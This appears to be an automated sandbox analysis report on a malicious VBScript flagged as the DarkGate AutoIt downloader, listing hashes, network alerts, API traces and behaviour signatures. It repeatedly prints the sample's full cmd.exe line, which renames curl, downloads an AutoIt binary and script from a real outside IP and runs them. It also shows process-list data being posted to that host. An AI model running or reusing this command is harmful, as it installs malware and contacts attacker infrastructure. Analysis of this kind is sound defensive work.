Summary | ZeroBOX

neverban_pvLGjZ.vbs

[C] All Process AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 26, 2023, 6:16 p.m. Sept. 26, 2023, 6:18 p.m.
Size 1.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 457f92980b658c7332928d72faff99a9
SHA256 c40ec260d9696bf067e8f20f23de6176c44dfe5032015cae668c368a04e3cdd7
CRC32 0A522374
ssdeep 48:4onCJVDHVxaM65t67ZUeLbk8RQ3cow87QW43mHqtzvO5E:PsavD61VDQMowy42Kta5E
Yara
  • VBScript_Check_All_Process - VBScript Check All Process

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
66.42.63.27 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 66.42.63.27:2351 -> 192.168.56.101:49161 2048098 ET MALWARE DarkGate AutoIt Downloader A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: The system cannot find the file specified.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'wxnc' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'wxnc' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'Autoit3.exe' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c mkdir c:\wxnc & cd /d c:\wxnc & copy c:\windows\system32\curl.exe wxnc.exe & wxnc -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & wxnc -o mqfcre.au3 http://66.42.63.27:2351/msiwxncevmm & Autoit3.exe mqfcre.au3
wmi Select * from Win32_Process
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c mkdir c:\wxnc & cd /d c:\wxnc & copy c:\windows\system32\curl.exe wxnc.exe & wxnc -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & wxnc -o mqfcre.au3 http://66.42.63.27:2351/msiwxncevmm & Autoit3.exe mqfcre.au3
filepath: cmd
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\cmd.exe" /c mkdir c:\wxnc & cd /d c:\wxnc & copy c:\windows\system32\curl.exe wxnc.exe & wxnc -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & wxnc -o mqfcre.au3 http://66.42.63.27:2351/msiwxncevmm & Autoit3.exe mqfcre.au3
cmdline cmd /c mkdir c:\wxnc & cd /d c:\wxnc & copy c:\windows\system32\curl.exe wxnc.exe & wxnc -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & wxnc -o mqfcre.au3 http://66.42.63.27:2351/msiwxncevmm & Autoit3.exe mqfcre.au3
host 66.42.63.27
Time & API Arguments Status Return Repeated

WSASend

buffer: POST /wxncevmm HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) a: System Idle ProcessSystemsmss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exelsm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeaudiodg.exesvchost.exesvchost.exespoolsv.exesvchost.exesrvany.exeKMService.execonhost.exetaskhost.exesppsvc.exesvchost.exedwm.exeexplorer.exepw.exeSearchIndexer.exeSearchProtocolHost.exeSearchFilterHost.exemobsync.exepw.exetaskhost.exewsqmcons.exesdclt.exewscript.exeWmiPrvSE.exe Content-Length: 0 Host: 66.42.63.27:2351
socket: 608
0 0
Time & API Arguments Status Return Repeated

WSASend

buffer: POST /wxncevmm HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) a: System Idle ProcessSystemsmss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exelsm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeaudiodg.exesvchost.exesvchost.exespoolsv.exesvchost.exesrvany.exeKMService.execonhost.exetaskhost.exesppsvc.exesvchost.exedwm.exeexplorer.exepw.exeSearchIndexer.exeSearchProtocolHost.exeSearchFilterHost.exemobsync.exepw.exetaskhost.exewsqmcons.exesdclt.exewscript.exeWmiPrvSE.exe Content-Length: 0 Host: 66.42.63.27:2351
socket: 608
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c mkdir c:\wxnc & cd /d c:\wxnc & copy c:\windows\system32\curl.exe wxnc.exe & wxnc -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & wxnc -o mqfcre.au3 http://66.42.63.27:2351/msiwxncevmm & Autoit3.exe mqfcre.au3
parent_process wscript.exe martian_process cmd /c mkdir c:\wxnc & cd /d c:\wxnc & copy c:\windows\system32\curl.exe wxnc.exe & wxnc -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & wxnc -o mqfcre.au3 http://66.42.63.27:2351/msiwxncevmm & Autoit3.exe mqfcre.au3
Process injection Process 2636 resumed a thread in remote process 2828
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000038c
suspend_count: 1
process_identifier: 2828
1 0 0
file C:\Windows\System32\cmd.exe